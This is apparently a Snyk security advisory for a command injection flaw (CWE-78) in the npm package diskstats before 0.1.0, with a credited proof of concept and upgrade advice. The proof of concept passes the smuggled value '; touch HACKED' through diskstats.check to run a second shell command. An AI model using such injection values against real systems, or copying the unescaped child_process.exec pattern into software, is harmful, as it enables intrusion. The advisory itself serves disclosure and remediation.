Command Injection

Affecting diskstats package, versions <0.1.0


Overview

diskstats is a library that uses df to pull disk information such as free space & inode utilization on your system.

Affected versions of this package are vulnerable to Command Injection. The path parameter is concatenated into the command string that is passed to the child_process.exec function without any validation or escaping, so shell metacharacters in the supplied path are interpreted by the shell.

PoC by Alessio (d3lla)

  1. create a directory for testing

    mkdir poc
    cd poc/

  2. install the diskstats module:

    npm i diskstats

  3. create the following PoC JavaScript file (poc.js):

    const diskstats = require('diskstats');
    diskstats.check('; touch HACKED', (err, results) => {});

  4. make sure that the HACKED file does not exist:

    ls

  5. execute the poc.js file:

    node poc.js

  6. the HACKED file is created:

    ls

Remediation

Upgrade diskstats to version 0.1.0 or higher.

References

CVSS Score

9.8
high severity
  • Attack Vector
    Network
  • Attack Complexity
    Low
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    High
  • Integrity
    High
  • Availability
    High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C
Credit
d3lla
CWE
CWE-78
Snyk ID
SNYK-JS-DISKSTATS-590099
Disclosed
23 Jul, 2020
Published
24 Jul, 2020